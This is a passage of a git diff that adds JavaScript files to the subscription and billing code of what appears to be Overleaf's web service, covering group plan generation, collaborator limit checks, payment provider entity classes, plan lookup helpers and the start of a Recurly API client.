various group plan options we provide, and +// is used in the app the render the appropriate dialog in the plans page, and +// to generate the appropriate entries in the Settings.plans array. +// It is also used by scripts/recurly/sync_recurly.rb, which will make sure +// Recurly has a plan configured for all the groups, and that the prices are +// up to date with the data in groups.json. +// Alternatively, scripts/recurly/get_recurly_group_prices.rb can be used to +// fetch pricing data and generate a groups.json using the current Recurly +// prices +const data = fs.readFileSync( + Path.join(__dirname, '/../../../templates/plans/groups.json') +) +const groups = JSON.parse(data.toString()) + +const capitalize = string => string.charAt(0).toUpperCase() + string.slice(1) + +// With group accounts in Recurly, we end up with a lot of plans to manage. +// Rather than hand coding them in the settings file, and then needing to keep +// that data in sync with the data in groups.json, we can auto generate the +// group plan entries and append them to Settings.plans at boot time. This is not +// a particularly clean pattern, since it's a little surprising that settings +// are modified at boot-time, but I think it's a better option than trying to +// keep two sources of data in sync. +for (const [usage, planData] of Object.entries(groups)) { + for (const [planCode, currencyData] of Object.entries(planData)) { + // Gather all possible sizes that are set up in at least one currency + const sizes = new Set() + for (const priceData of Object.values(currencyData)) { + for (const size in priceData) { + sizes.add(size) + } + } + + const planName = + planCode === 'collaborator' + ? 'Standard (Collaborator)' + : capitalize(planCode) + + // Generate plans in settings + for (const size of sizes) { + const plan = { + planCode: `group_${planCode}_${size}_${usage}`, + name: `${ + Settings.appName + } ${planName} - Group Account (${size} licenses) - ${capitalize( + usage + )}`, + hideFromUsers: true, + price_in_cents: groups[usage][planCode].USD[size].price_in_cents, + annual: true, + features: Settings.features[planCode], + groupPlan: true, + membersLimit: parseInt(size), + // Add the `membersLimitAddOn` to all group plans + membersLimitAddOn: 'additional-license', + // Unlock flexible licensing for all group plans + canUseFlexibleLicensing: true, + } + + Settings.plans.push(plan) + } + } +} + +module.exports = groups diff --git a/services/web/app/src/Features/Subscription/GroupUtils.js b/services/web/app/src/Features/Subscription/GroupUtils.js new file mode 100644 index 0000000..55aea1a --- /dev/null +++ b/services/web/app/src/Features/Subscription/GroupUtils.js @@ -0,0 +1,14 @@ +// ts-check +/** + * Builds a group subscription's `providerId` to be used to identify SAML identifiers + * belonging to this group. + * @param {string | import('mongodb').ObjectId} subscriptionId + * @returns {string} + */ +function getProviderId(subscriptionId) { + return `ol-group-subscription-id:${subscriptionId.toString()}` +} + +module.exports = { + getProviderId, +} diff --git a/services/web/app/src/Features/Subscription/LimitationsManager.js b/services/web/app/src/Features/Subscription/LimitationsManager.js new file mode 100644 index 0000000..d0c3d29 --- /dev/null +++ b/services/web/app/src/Features/Subscription/LimitationsManager.js @@ -0,0 +1,215 @@ +// @ts-check + +const logger = require('@overleaf/logger') +const ProjectGetter = require('../Project/ProjectGetter') +const UserGetter = require('../User/UserGetter') +const SubscriptionLocator = require('./SubscriptionLocator') +const Settings = require('@overleaf/settings') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const CollaboratorsInvitesGetter = require('../Collaborators/CollaboratorsInviteGetter') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') + +async function allowedNumberOfCollaboratorsInProject(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: true, + }) + return await allowedNumberOfCollaboratorsForUser(project.owner_ref) +} + +async function allowedNumberOfCollaboratorsForUser(userId) { + const user = await UserGetter.promises.getUser(userId, { features: 1 }) + if (user.features && user.features.collaborators) { + return user.features.collaborators + } else { + return Settings.defaultFeatures.collaborators + } +} + +async function canAcceptEditCollaboratorInvite(projectId) { + const allowedNumber = await allowedNumberOfCollaboratorsInProject(projectId) + if (allowedNumber < 0) { + return true // -1 means unlimited + } + const currentEditors = + await CollaboratorsGetter.promises.getInvitedEditCollaboratorCount( + projectId + ) + return currentEditors + 1 <= allowedNumber +} + +async function canAddXEditCollaborators( + projectId, + numberOfNewEditCollaborators +) { + const allowedNumber = await allowedNumberOfCollaboratorsInProject(projectId) + if (allowedNumber < 0) { + return true // -1 means unlimited + } + const currentEditors = + await CollaboratorsGetter.promises.getInvitedEditCollaboratorCount( + projectId + ) + const editInviteCount = + await CollaboratorsInvitesGetter.promises.getEditInviteCount(projectId) + return ( + currentEditors + editInviteCount + numberOfNewEditCollaborators <= + allowedNumber + ) +} + +/** + * Check whether a collaborator can be switched to the given privilege level + * + * @param {string} projectId + * @param {string} userId + * @param {'readOnly' | 'review' | 'readAndWrite'} privilegeLevel + * @return {Promise<boolean>} + */ +async function canChangeCollaboratorPrivilegeLevel( + projectId, + userId, + privilegeLevel +) { + if (privilegeLevel === PrivilegeLevels.READ_ONLY) { + return true + } + + const currentPrivilegeLevel = + await CollaboratorsGetter.promises.getMemberIdPrivilegeLevel( + userId, + projectId + ) + if ( + currentPrivilegeLevel === PrivilegeLevels.READ_AND_WRITE || + currentPrivilegeLevel === PrivilegeLevels.REVIEW + ) { + // Current collaborator already takes a slot, so changing the privilege + // level won't increase the collaborator count + return true + } + + const allowedNumber = await allowedNumberOfCollaboratorsInProject(projectId) + if (allowedNumber < 0) { + // -1 means unlimited + return true + } + + const slotsTaken = + await CollaboratorsGetter.promises.getInvitedEditCollaboratorCount( + projectId + ) + const inviteCount = + await CollaboratorsInvitesGetter.promises.getEditInviteCount(projectId) + + return slotsTaken + inviteCount < allowedNumber +} + +async function hasPaidSubscription(user) { + const { hasSubscription, subscription } = await userHasSubscription(user) + const { isMember } = await userIsMemberOfGroupSubscription(user) + return { + hasPaidSubscription: hasSubscription || isMember, + subscription, + } +} + +// alias for backward-compatibility with modules. Use `haspaidsubscription` instead +async function userHasSubscriptionOrIsGroupMember(user) { + return await hasPaidSubscription(user) +} + +async function userHasSubscription(user) { + const subscription = await SubscriptionLocator.promises.getUsersSubscription( + user._id + ) + let hasValidSubscription = false + if (subscription) { + if (subscription.recurlySubscription_id || subscription.customAccount) { + hasValidSubscription = true + } + } + return { + hasSubscription: hasValidSubscription, + subscription, + } +} + +async function userIsMemberOfGroupSubscription(user) { + const subscriptions = + (await SubscriptionLocator.promises.getMemberSubscriptions(user._id)) || [] + return { isMember: subscriptions.length > 0, subscriptions } +} + +function teamHasReachedMemberLimit(subscription) { + const currentTotal = + (subscription.member_ids || []).length + + (subscription.teamInvites || []).length + + (subscription.invited_emails || []).length + + return currentTotal >= subscription.membersLimit +} + +async function hasGroupMembersLimitReached(subscriptionId, callback) { + const subscription = + await SubscriptionLocator.promises.getSubscription(subscriptionId) + if (!subscription) { + logger.warn({ subscriptionId }, 'no subscription found') + throw new Error('no subscription found') + } + const limitReached = teamHasReachedMemberLimit(subscription) + return { limitReached, subscription } +} + +const LimitationsManager = { + allowedNumberOfCollaboratorsInProject: callbackify( + allowedNumberOfCollaboratorsInProject + ), + allowedNumberOfCollaboratorsForUser: callbackify( + allowedNumberOfCollaboratorsForUser + ), + canAddXEditCollaborators: callbackify(canAddXEditCollaborators), + canChangeCollaboratorPrivilegeLevel: callbackify( + canChangeCollaboratorPrivilegeLevel + ), + hasPaidSubscription: callbackifyMultiResult(hasPaidSubscription, [ + 'hasPaidSubscription', + 'subscription', + ]), + userHasSubscriptionOrIsGroupMember: callbackifyMultiResult( + userHasSubscriptionOrIsGroupMember, + ['hasPaidSubscription', 'subscription'] + ), + userHasSubscription: callbackifyMultiResult(userHasSubscription, [ + 'hasSubscription', + 'subscription', + ]), + userIsMemberOfGroupSubscription: callbackifyMultiResult( + userIsMemberOfGroupSubscription, + ['isMember', 'subscriptions'] + ), + hasGroupMembersLimitReached: callbackifyMultiResult( + hasGroupMembersLimitReached, + ['limitReached', 'subscription'] + ), + + teamHasReachedMemberLimit, + + promises: { + allowedNumberOfCollaboratorsInProject, + allowedNumberOfCollaboratorsForUser, + canAcceptEditCollaboratorInvite, + canAddXEditCollaborators, + canChangeCollaboratorPrivilegeLevel, + hasPaidSubscription, + userHasSubscriptionOrIsGroupMember, + userHasSubscription, + userIsMemberOfGroupSubscription, + hasGroupMembersLimitReached, + }, +} + +module.exports = LimitationsManager diff --git a/services/web/app/src/Features/Subscription/PaymentProviderEntities.js b/services/web/app/src/Features/Subscription/PaymentProviderEntities.js new file mode 100644 index 0000000..472747e --- /dev/null +++ b/services/web/app/src/Features/Subscription/PaymentProviderEntities.js @@ -0,0 +1,521 @@ +// @ts-check + +const OError = require('@overleaf/o-error') +const { DuplicateAddOnError, AddOnNotPresentError } = require('./Errors') +const PlansLocator = require('./PlansLocator') +const SubscriptionHelper = require('./SubscriptionHelper') + +const AI_ADD_ON_CODE = 'assistant' +const MEMBERS_LIMIT_ADD_ON_CODE = 'additional-license' +const STANDALONE_AI_ADD_ON_CODES = ['assistant', 'assistant-annual'] + +class PaymentProviderSubscription { + /** + * @param {object} props + * @param {string} props.id + * @param {string} props.userId + * @param {string} props.planCode + * @param {string} props.planName + * @param {number} props.planPrice + * @param {PaymentProviderSubscriptionAddOn[]} [props.addOns] + * @param {number} props.subtotal + * @param {number} [props.taxRate] + * @param {number} [props.taxAmount] + * @param {string} props.currency + * @param {number} props.total + * @param {Date} props.periodStart + * @param {Date} props.periodEnd + * @param {string} props.collectionMethod + * @param {PaymentProviderSubscriptionChange} [props.pendingChange] + * @param {string} [props.service] + * @param {string} [props.state] + * @param {Date|null} [props.trialPeriodEnd] + * @param {Date|null} [props.pausePeriodStart] + * @param {number|null} [props.remainingPauseCycles] + */ + constructor(props) { + this.id = props.id + this.userId = props.userId + this.planCode = props.planCode + this.planName = props.planName + this.planPrice = props.planPrice + this.addOns = props.addOns ?? [] + this.subtotal = props.subtotal + this.taxRate = props.taxRate ?? 0 + this.taxAmount = props.taxAmount ?? 0 + this.currency = props.currency + this.total = props.total + this.periodStart = props.periodStart + this.periodEnd = props.periodEnd + this.collectionMethod = props.collectionMethod + this.pendingChange = props.pendingChange ?? null + this.service = props.service ?? 'recurly' + this.state = props.state ?? 'active' + this.trialPeriodEnd = props.trialPeriodEnd ?? null + this.pausePeriodStart = props.pausePeriodStart ?? null + this.remainingPauseCycles = props.remainingPauseCycles ?? null + } + + /** + * Returns whether this subscription currently has the given add-on + * + * @param {string} code + * @return {boolean} + */ + hasAddOn(code) { + return this.addOns.some(addOn => addOn.code === code) + } + + /** + * Returns whether this subscription is a standalone AI add-on subscription + * + * @return {boolean} + */ + isStandaloneAiAddOn() { + return isStandaloneAiAddOnPlanCode(this.planCode) + } + + /** + * Returns whether this subcription will have the given add-on next billing + * period. + * + * There are two cases: either the subscription already has the add-on and + * won't change next period, or the subscription will change next period and + * the change includes the add-on. + * + * @param {string} code + * @return {boolean} + */ + hasAddOnNextPeriod(code) { + if (this.pendingChange != null) { + return this.pendingChange.nextAddOns.some(addOn => addOn.code === code) + } else { + return this.hasAddOn(code) + } + } + + /** + * Change this subscription's plan + * + * @return {PaymentProviderSubscriptionChangeRequest} + */ + getRequestForPlanChange(planCode) { + const currentPlan = PlansLocator.findLocalPlanInSettings(this.planCode) + if (currentPlan == null) { + throw new OError('Unable to find plan in settings', { + planCode: this.planCode, + }) + } + const newPlan = PlansLocator.findLocalPlanInSettings(planCode) + if (newPlan == null) { + throw new OError('Unable to find plan in settings', { planCode }) + } + const shouldChangeAtTermEnd = SubscriptionHelper.shouldPlanChangeAtTermEnd( + currentPlan, + newPlan + ) + + const changeRequest = new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: shouldChangeAtTermEnd ? 'term_end' : 'now', + planCode, + }) + + // Carry the AI add-on to the new plan if applicable + if ( + this.isStandaloneAiAddOn() || + (!shouldChangeAtTermEnd && this.hasAddOn(AI_ADD_ON_CODE)) || + (shouldChangeAtTermEnd && this.hasAddOnNextPeriod(AI_ADD_ON_CODE)) + ) { + const addOnUpdate = new PaymentProviderSubscriptionAddOnUpdate({ + code: AI_ADD_ON_CODE, + quantity: 1, + }) + changeRequest.addOnUpdates = [addOnUpdate] + } + + return changeRequest + } + + /** + * Purchase an add-on on this subscription + * + * @param {string} code + * @param {number} [quantity] + * @param {number} [unitPrice] + * @return {PaymentProviderSubscriptionChangeRequest} - the change request to send to + * Recurly + * + * @throws {DuplicateAddOnError} if the add-on is already present on the subscription + */ + getRequestForAddOnPurchase(code, quantity = 1, unitPrice) { + if (this.hasAddOn(code)) { + throw new DuplicateAddOnError('Subscription already has add-on', { + subscriptionId: this.id, + addOnCode: code, + }) + } + + const addOnUpdates = this.addOns.map(addOn => addOn.toAddOnUpdate()) + addOnUpdates.push( + new PaymentProviderSubscriptionAddOnUpdate({ code, quantity, unitPrice }) + ) + return new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: 'now', + addOnUpdates, + }) + } + + /** + * Update an add-on on this subscription + * + * @param {string} code + * @param {number} quantity + * @return {PaymentProviderSubscriptionChangeRequest} - the change request to send to + * Recurly + * + * @throws {AddOnNotPresentError} if the subscription doesn't have the add-on + */ + getRequestForAddOnUpdate(code, quantity) { + if (!this.hasAddOn(code)) { + throw new AddOnNotPresentError( + 'Subscription does not have add-on to update', + { + subscriptionId: this.id, + addOnCode: code, + } + ) + } + + const addOnUpdates = this.addOns.map(addOn => { + const update = addOn.toAddOnUpdate() + + if (update.code === code) { + update.quantity = quantity + } + + return update + }) + + return new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: 'now', + addOnUpdates, + }) + } + + /** + * Remove an add-on from this subscription + * + * @param {string} code + * @return {PaymentProviderSubscriptionChangeRequest} + * + * @throws {AddOnNotPresentError} if the subscription doesn't have the add-on + */ + getRequestForAddOnRemoval(code) { + if (!this.hasAddOn(code)) { + throw new AddOnNotPresentError( + 'Subscription does not have add-on to remove', + { + subscriptionId: this.id, + addOnCode: code, + } + ) + } + const addOnUpdates = this.addOns + .filter(addOn => addOn.code !== code) + .map(addOn => addOn.toAddOnUpdate()) + return new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: 'term_end', + addOnUpdates, + }) + } + + /** + * Upgrade group plan with the plan code provided + * + * @param {string} newPlanCode + * @return {PaymentProviderSubscriptionChangeRequest} + */ + getRequestForGroupPlanUpgrade(newPlanCode) { + // Ensure all the existing add-ons are added to the new plan + const addOns = this.addOns.map( + addOn => + new PaymentProviderSubscriptionAddOnUpdate({ + code: addOn.code, + quantity: addOn.quantity, + }) + ) + + return new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: 'now', + addOnUpdates: addOns, + planCode: newPlanCode, + }) + } + + /** + * Returns whether this subscription is manually collected + * + * @return {boolean} + */ + get isCollectionMethodManual() { + return this.collectionMethod === 'manual' + } +} + +/** + * An add-on attached to a subscription + */ +class PaymentProviderSubscriptionAddOn { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.name + * @param {number} props.quantity + * @param {number} props.unitPrice + */ + constructor(props) { + this.code = props.code + this.name = props.name + this.quantity = props.quantity + this.unitPrice = props.unitPrice + this.preTaxTotal = this.quantity * this.unitPrice + } + + /** + * Return an add-on update that doesn't modify the add-on + */ + toAddOnUpdate() { + return new PaymentProviderSubscriptionAddOnUpdate({ + code: this.code, + quantity: this.quantity, + unitPrice: this.unitPrice, + }) + } +} + +class PaymentProviderSubscriptionChangeRequest { + /** + * @param {object} props + * @param {PaymentProviderSubscription} props.subscription + * @param {"now" | "term_end"} props.timeframe + * @param {string} [props.planCode] + * @param {PaymentProviderSubscriptionAddOnUpdate[]} [props.addOnUpdates] + */ + constructor(props) { + if (props.planCode == null && props.addOnUpdates == null) { + throw new OError('Invalid PaymentProviderSubscriptionChangeRequest', { + props, + }) + } + this.subscription = props.subscription + this.timeframe = props.timeframe + this.planCode = props.planCode ?? null + this.addOnUpdates = props.addOnUpdates ?? null + } +} + +class PaymentProviderSubscriptionAddOnUpdate { + /** + * @param {object} props + * @param {string} props.code + * @param {number} [props.quantity] + * @param {number} [props.unitPrice] + */ + constructor(props) { + this.code = props.code + this.quantity = props.quantity ?? null + this.unitPrice = props.unitPrice ?? null + } +} + +class PaymentProviderSubscriptionChange { + /** + * @param {object} props + * @param {PaymentProviderSubscription} props.subscription + * @param {string} props.nextPlanCode + * @param {string} props.nextPlanName + * @param {number} props.nextPlanPrice + * @param {PaymentProviderSubscriptionAddOn[]} props.nextAddOns + * @param {PaymentProviderImmediateCharge} [props.immediateCharge] + */ + constructor(props) { + this.subscription = props.subscription + this.nextPlanCode = props.nextPlanCode + this.nextPlanName = props.nextPlanName + this.nextPlanPrice = props.nextPlanPrice + this.nextAddOns = props.nextAddOns + this.immediateCharge = + props.immediateCharge ?? + new PaymentProviderImmediateCharge({ + subtotal: 0, + tax: 0, + total: 0, + discount: 0, + }) + + this.subtotal = this.nextPlanPrice + for (const addOn of this.nextAddOns) { + this.subtotal += addOn.preTaxTotal + } + + this.tax = Math.round(this.subtotal * 100 * this.subscription.taxRate) / 100 + + this.total = this.subtotal + this.tax + } + + getAddOn(addOnCode) { + return this.nextAddOns.find(addOn => addOn.code === addOnCode) + } +} + +class PaypalPaymentMethod { + toString() { + return 'Paypal' + } +} + +class CreditCardPaymentMethod { + /** + * @param {object} props + * @param {string} props.cardType + * @param {string} props.lastFour + */ + constructor(props) { + this.cardType = props.cardType + this.lastFour = props.lastFour + } + + toString() { + return `${this.cardType} **** ${this.lastFour}` + } +} + +class PaymentProviderImmediateCharge { + /** + * @param {object} props + * @param {number} props.subtotal + * @param {number} props.tax + * @param {number} props.total + * @param {number} props.discount + */ + constructor(props) { + this.subtotal = props.subtotal + this.tax = props.tax + this.total = props.total + this.discount = props.discount + } +} + +/** + * An add-on configuration, independent of any subscription + */ +class PaymentProviderAddOn { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.name + */ + constructor(props) { + this.code = props.code + this.name = props.name + } +} + +/** + * A plan configuration + */ +class PaymentProviderPlan { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.name + */ + constructor(props) { + this.code = props.code + this.name = props.name + } +} + +/** + * A coupon in the payment provider + */ +class PaymentProviderCoupon { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.name + * @param {string} props.description + */ + constructor(props) { + this.code = props.code + this.name = props.name + this.description = props.description + } +} + +/** + * An account in the payment provider + */ +class PaymentProviderAccount { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.email + * @param {boolean} props.hasPastDueInvoice + */ + constructor(props) { + this.code = props.code + this.email = props.email + this.hasPastDueInvoice = props.hasPastDueInvoice ?? false + } +} + +/** + * Returns whether the given plan code is a standalone AI plan + * + * @param {string} planCode + */ +function isStandaloneAiAddOnPlanCode(planCode) { + return STANDALONE_AI_ADD_ON_CODES.includes(planCode) +} + +/** + * Returns whether subscription change will have have the ai bundle once the change is processed + * + * @param {PaymentProviderSubscriptionChange} subscriptionChange The subscription change object coming from payment provider + * + * @return {boolean} + */ +function subscriptionChangeIsAiAssistUpgrade(subscriptionChange) { + return Boolean( + isStandaloneAiAddOnPlanCode(subscriptionChange.nextPlanCode) || + subscriptionChange.nextAddOns?.some( + addOn => addOn.code === AI_ADD_ON_CODE + ) + ) +} + +module.exports = { + AI_ADD_ON_CODE, + MEMBERS_LIMIT_ADD_ON_CODE, + STANDALONE_AI_ADD_ON_CODES, + PaymentProviderSubscription, + PaymentProviderSubscriptionAddOn, + PaymentProviderSubscriptionChange, + PaymentProviderSubscriptionChangeRequest, + PaymentProviderSubscriptionAddOnUpdate, + PaypalPaymentMethod, + CreditCardPaymentMethod, + PaymentProviderAddOn, + PaymentProviderPlan, + PaymentProviderCoupon, + PaymentProviderAccount, + isStandaloneAiAddOnPlanCode, + subscriptionChangeIsAiAssistUpgrade, + PaymentProviderImmediateCharge, +} diff --git a/services/web/app/src/Features/Subscription/PlansHelper.mjs b/services/web/app/src/Features/Subscription/PlansHelper.mjs new file mode 100644 index 0000000..aa23a8d --- /dev/null +++ b/services/web/app/src/Features/Subscription/PlansHelper.mjs @@ -0,0 +1,21 @@ +import FeaturesHelper from './FeaturesHelper.js' +import PlanLocator from './PlansLocator.js' + +export function isProfessionalPlan(planCode) { + const plan = PlanLocator.findLocalPlanInSettings(planCode) + // only identify "modern" professional group plans as eligible, and do not include legacy plans + return Boolean( + planCode?.includes('professional') && + FeaturesHelper.getMatchedFeatureSet(plan?.features) === 'professional' + ) +} + +export function isProfessionalGroupPlan(subscription) { + const isProfessional = isProfessionalPlan(subscription.planCode) + return subscription.groupPlan && isProfessional +} + +export default { + isProfessionalPlan, + isProfessionalGroupPlan, +} diff --git a/services/web/app/src/Features/Subscription/PlansLocator.js b/services/web/app/src/Features/Subscription/PlansLocator.js new file mode 100644 index 0000000..905fa7e --- /dev/null +++ b/services/web/app/src/Features/Subscription/PlansLocator.js @@ -0,0 +1,104 @@ +// TODO: This file may be deleted when Stripe is fully implemented to all users, so, consider deleting it +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +/** + * @typedef {import('../../../../types/subscription/plan').RecurlyPlanCode} RecurlyPlanCode + * @typedef {import('../../../../types/subscription/plan').StripeLookupKey} StripeLookupKey + */ + +function ensurePlansAreSetupCorrectly() { + Settings.plans.forEach(plan => { + if (typeof plan.price_in_cents !== 'number') { + logger.fatal({ plan }, 'missing price on plan') + process.exit(1) + } + if (plan.price) { + logger.fatal({ plan }, 'unclear price attribute on plan') + process.exit(1) + } + if (plan.price_in_unit) { + logger.fatal({ plan }, 'deprecated price_in_unit attribute on plan') + process.exit(1) + } + }) +} + +const recurlyPlanCodeToStripeLookupKey = { + 'professional-annual': 'professional_annual', + professional: 'professional_monthly', + professional_free_trial_7_days: 'professional_monthly', + 'collaborator-annual': 'standard_annual', + collaborator: 'standard_monthly', + collaborator_free_trial_7_days: 'standard_monthly', + 'student-annual': 'student_annual', + student: 'student_monthly', + student_free_trial_7_days: 'student_monthly', +} + +const stripeLookupKeyToRecurlyPlanCode = { + professional_annual: 'professional-annual', + professional_monthly: 'professional', + standard_annual: 'collaborator-annual', + standard_monthly: 'collaborator', + student_annual: 'student-annual', + student_monthly: 'student', +} + +/** + * + * @param {RecurlyPlanCode} recurlyPlanCode + * @returns {StripeLookupKey} + */ +function mapRecurlyPlanCodeToStripeLookupKey(recurlyPlanCode) { + return recurlyPlanCodeToStripeLookupKey[recurlyPlanCode] +} + +/** + * @param {StripeLookupKey} stripeLookupKey + * @returns {RecurlyPlanCode} + */ +function mapStripeLookupKeyToRecurlyPlanCode(stripeLookupKey) { + return stripeLookupKeyToRecurlyPlanCode[stripeLookupKey] +} + +const recurlyPlanCodeToPlanTypeAndPeriod = { + collaborator: { planType: 'standard', period: 'monthly' }, + collaborator_free_trial_7_days: { planType: 'standard', period: 'monthly' }, + 'collaborator-annual': { planType: 'standard', period: 'annual' }, + professional: { planType: 'professional', period: 'monthly' }, + professional_free_trial_7_days: { + planType: 'professional', + period: 'monthly', + }, + 'professional-annual': { planType: 'professional', period: 'annual' }, + student: { planType: 'student', period: 'monthly' }, + student_free_trial_7_days: { planType: 'student', period: 'monthly' }, + 'student-annual': { planType: 'student', period: 'annual' }, +} + +/** + * + * @param {RecurlyPlanCode} recurlyPlanCode + * @returns {{ planType: 'standard' | 'professional' | 'student', period: 'annual' | 'monthly'}} + */ +function getPlanTypeAndPeriodFromRecurlyPlanCode(recurlyPlanCode) { + return recurlyPlanCodeToPlanTypeAndPeriod[recurlyPlanCode] +} + +function findLocalPlanInSettings(planCode) { + for (const plan of Settings.plans) { + if (plan.planCode === planCode) { + return plan + } + } + return null +} + +module.exports = { + ensurePlansAreSetupCorrectly, + findLocalPlanInSettings, + mapRecurlyPlanCodeToStripeLookupKey, + mapStripeLookupKeyToRecurlyPlanCode, + getPlanTypeAndPeriodFromRecurlyPlanCode, +} diff --git a/services/web/app/src/Features/Subscription/RecurlyClient.js b/services/web/app/src/Features/Subscription/RecurlyClient.js new file mode 100644 index 0000000..ee56487 --- /dev/null +++ b/services/web/app/src/Features/Subscription/RecurlyClient.js @@ -0,0 +1,643 @@ +// @ts-check + +const recurly = require('recurly') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { callbackify } = require('util') +const UserGetter = require('../User/UserGetter') +const { + PaymentProviderSubscription, + PaymentProviderSubscriptionAddOn, + PaymentProviderSubscriptionChange, + PaypalPaymentMethod, + CreditCardPaymentMethod, + PaymentProviderAddOn, + PaymentProviderPlan, + PaymentProviderCoupon, + PaymentProviderAccount, + PaymentProviderImmediateCharge, +} = require('./PaymentProviderEntities') +const { + MissingBillingInfoError, + SubtotalLimitExceededError, +} = require('./Errors') + +/** + * @import { PaymentProviderSubscriptionChangeRequest } from './PaymentProviderEntities' + * @import { PaymentMethod } from './types' + */ + +const recurlySettings = Settings.apis.recurly +const recurlyApiKey = recurlySettings ? recurlySettings.apiKey : undefined + +const client = new recurly.Client(recurlyApiKey) + +/** + * Get account for a given user + * + * @param {string} userId + * @return {Promise<PaymentProviderAccount | null>} + */ +async function getAccountForUserId(userId) { + try { + const account = await client.getAccount(`code-${userId}`) + return accountFromApi(account) + } catch (err) { + if (err instanceof recurly.errors.NotFoundError) { + // An expected error, we don't need to handle it, just return nothing + logger.debug({ userId }, 'no recurly account found for user') + return null + } else { + throw err + } + } +} + +async function createAccountForUserId(userId) { + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + first_name: 1, + last_name: 1, + email: 1, + }) + const accountCreate = { + code: user._id.toString(), + email: user.email, + firstName: user.first_name, + lastName: user.last_name, + } + const account = await client.createAccount(accountCreate) + logger.debug({ userId, account }, 'created recurly account') + return account +} + +/** + * Get active coupons for a given user + * + * @param {string} userId + * @return {Promise<PaymentProviderCoupon[]>} + */ +async function getActiveCouponsForUserId(userId) { + try { + const redemptions = await client.listActiveCouponRedemptions( + `code-${userId}` + ) + + const coupons = [] + for await (const redemption of redemptions.each()) { + coupons.push(couponFromApi(redemption)) + } + + return coupons + } catch (err) { + // An expected error if no coupons have been redeemed + if (err instanceof recurly.errors.NotFoundError) { + return [] + } else { + throw err + } + } +} + +/** + * Get a subscription from Recurly + * + * @param {string} subscriptionId + * @return {Promise<PaymentProviderSubscription>} + */ +async function getSubscription(subscriptionId) { + const subscription = await client.getSubscription(`uuid-${subscriptionId}`) + return subscriptionFromApi(subscription) +} + +/** + * Get the subscription for a given user + * + * Returns null if the user doesn't have an account or a subscription. Throws an + * error if the user has more than one subscription. + * + * @param {string} userId + * @return {Promise<PaymentProviderSubscription | null>} + */ +async function getSubscriptionForUser(userId) { + try { + const subscriptions = client.listAccountSubscriptions(`code-${userId}`, { + params: { state: 'active', limit: 2 }, + }) + + let result = null + + // The async iterator returns a NotFoundError if the account doesn't exist. + for await (const subscription of subscriptions.each()) { + if (result != null) { + throw new OError('User has more than one Recurly subscription', { + userId, + }) + } + result = subscription + } + if (result == null) { + return null + } + return subscriptionFromApi(result) + } catch (err) { + if (err instanceof recurly.errors.NotFoundError) { + return null + } else { + throw err + } + } +} + +/** + * Request a susbcription change from Recurly + * + * @param {PaymentProviderSubscriptionChangeRequest} changeRequest + */ +async function applySubscriptionChangeRequest(changeRequest) { + const body = subscriptionChangeRequestToApi(changeRequest) + + try { + const change = await client.createSubscriptionChange( + `uuid-${changeRequest.subscription.id}`, + body + ) + logger.debug( + { subscriptionId: changeRequest.subscription.id, changeId: change.id }, + 'created subscription change' + ) + } catch (err) { + if (err instanceof recurly.errors.ValidationError) { + /** + * @type {{params?: { param?: string }[] | null}} + */ + const validationError = err + if ( + validationError.params?.some( + p => p.param === 'subtotal_amount_in_cents' + ) + ) { + throw new SubtotalLimitExceededError( + 'Subtotal amount in cents exceeded error', + { + subscriptionId: changeRequest.subscription.id, + } + ) + } + } + throw err + } +} + +/** + * Preview a subscription change + * + * @param {PaymentProviderSubscriptionChangeRequest} changeRequest + * @return {Promise<PaymentProviderSubscriptionChange>} + */ +async function previewSubscriptionChange(changeRequest) { + const body = subscriptionChangeRequestToApi(changeRequest) + + try { + const subscriptionChange = await client.previewSubscriptionChange( + `uuid-${changeRequest.subscription.id}`, + body + ) + + return subscriptionChangeFromApi( + changeRequest.subscription, + subscriptionChange + ) + } catch (err) { + if (err instanceof recurly.errors.ValidationError) { + /** + * @type {{params?: { param?: string }[] | null}} + */ + const validationError = err + if ( + validationError.params?.some( + p => p.param === 'subtotal_amount_in_cents' + ) + ) { + throw new SubtotalLimitExceededError( + 'Subtotal amount in cents exceeded error', + { + subscriptionId: changeRequest.subscription.id, + } + ) + } + } + throw err + } +} + +async function removeSubscriptionChange(subscriptionId) { + const removed = await client.removeSubscriptionChange(subscriptionId) + logger.debug({ subscriptionId }, 'removed pending subscription change') + return removed +} + +async function removeSubscriptionChangeByUuid(subscriptionUuid) { + return await removeSubscriptionChange('uuid-' + subscriptionUuid) +} + +async function reactivateSubscriptionByUuid(subscriptionUuid) { + return await client.reactivateSubscription('uuid-' + subscriptionUuid) +} + +async function cancelSubscriptionByUuid(subscriptionUuid) { + try { + return await client.cancelSubscription('uuid-' + subscriptionUuid) + } catch (err) { + if (err instanceof recurly.errors.ValidationError) { + if ( + err.message === 'Only active and future subscriptions can be canceled.' + ) { + logger.debug( + { subscriptionUuid }, + 'subscription cancellation failed, subscription not active' + ) + } + } else { + throw err + } + } +} + +async function pauseSubscriptionByUuid(subscriptionUuid, pauseCycles) { + return await client.pauseSubscription('uuid-' + subscriptionUuid, { + remainingPauseCycles: pauseCycles, + }) +} + +async function resumeSubscriptionByUuid(subscriptionUuid) { + return await client.resumeSubscription('uuid-' + subscriptionUuid) +} + +/** + * Get the payment method for the given user + * + * @param {string} userId + * @return {Promise<PaymentMethod>} + */ +async function getPaymentMethod(userId) { + let billingInfo + + try { + billingInfo = await client.getBillingInfo(`code-${userId}`) + } catch (error) { + if (error instanceof recurly.errors.NotFoundError) { + throw new MissingBillingInfoError('This account has no billing info', { + userId, + }) + } + throw error + } + + return paymentMethodFromApi(billingInfo) +} + +/** + * Get the configuration for a 